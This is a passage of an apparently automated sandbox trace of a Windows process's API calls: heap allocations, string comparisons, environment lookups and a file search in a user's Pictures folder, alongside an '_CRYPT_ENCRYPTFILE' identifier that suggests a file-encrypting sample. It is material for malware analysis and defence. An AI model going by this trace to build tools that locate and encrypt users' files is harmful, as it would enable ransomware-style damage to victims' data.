lpString1="Ndo_wHdmDfLw8EHAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="do_wHdmDfLw8EHAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_wHdmDfLw8EHAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_wHdmDfLw8EHAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wHdmDfLw8EHAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HdmDfLw8EHAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dmDfLw8EHAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mDfLw8EHAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DfLw8EHAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fLw8EHAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lw8EHAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w8EHAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8EHAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EHAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HAJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0250.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AJ.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0250.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0250.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e559d0 [0250.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0250.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e559d0 | out: hHeap=0x970000) returned 1 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0250.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0250.385] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0250.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0250.385] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0250.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0250.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0250.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0250.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0250.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0250.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0250.386] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0250.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0250.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0250.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0250.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0250.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0250.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0250.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0250.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0250.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0250.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0250.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0250.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0250.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0250.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0250.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0250.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0250.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0250.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0250.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0250.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0250.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0250.387] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0250.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0250.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0250.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0250.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0250.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0250.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0250.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0250.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0250.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0250.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0250.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0250.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0250.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0250.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0250.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0250.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0250.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0250.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0250.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0250.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0250.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0250.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0250.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0250.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0250.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0250.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0250.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0250.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0250.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0250.391] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0250.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0250.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0250.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0250.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0250.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0250.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0250.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0250.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0250.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0250.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0250.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0250.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0250.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0250.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0250.392] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0250.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0250.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0250.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0250.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0250.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0250.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0250.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0250.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0250.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0250.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0250.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0250.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0250.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0250.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0250.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0250.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0250.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0250.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0250.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0250.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.393] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0250.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0250.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0250.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0250.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0250.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0250.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0250.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0250.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0250.394] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0250.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0250.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0250.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0250.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0250.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0250.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0250.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0250.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0250.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0250.395] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/Ndo_wHdmDfLw8EHAJ.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8cfc050, ftCreationTime.dwHighDateTime=0x1d5ee65, ftLastAccessTime.dwLowDateTime=0x3c2b4290, ftLastAccessTime.dwHighDateTime=0x1d5e80b, ftLastWriteTime.dwLowDateTime=0x3c2b4290, ftLastWriteTime.dwHighDateTime=0x1d5e80b, nFileSizeHigh=0x0, nFileSizeLow=0xc4dc, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="Ndo_wHdmDfLw8EHAJ.bmp", cAlternateFileName="NDO_WH~1.BMP")) returned 0xa87550 [0250.395] FindClose (in: hFindFile=0xa87550 | out: hFindFile=0xa87550) returned 1 [0250.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0250.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0250.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0250.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0250.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0250.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.395] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, 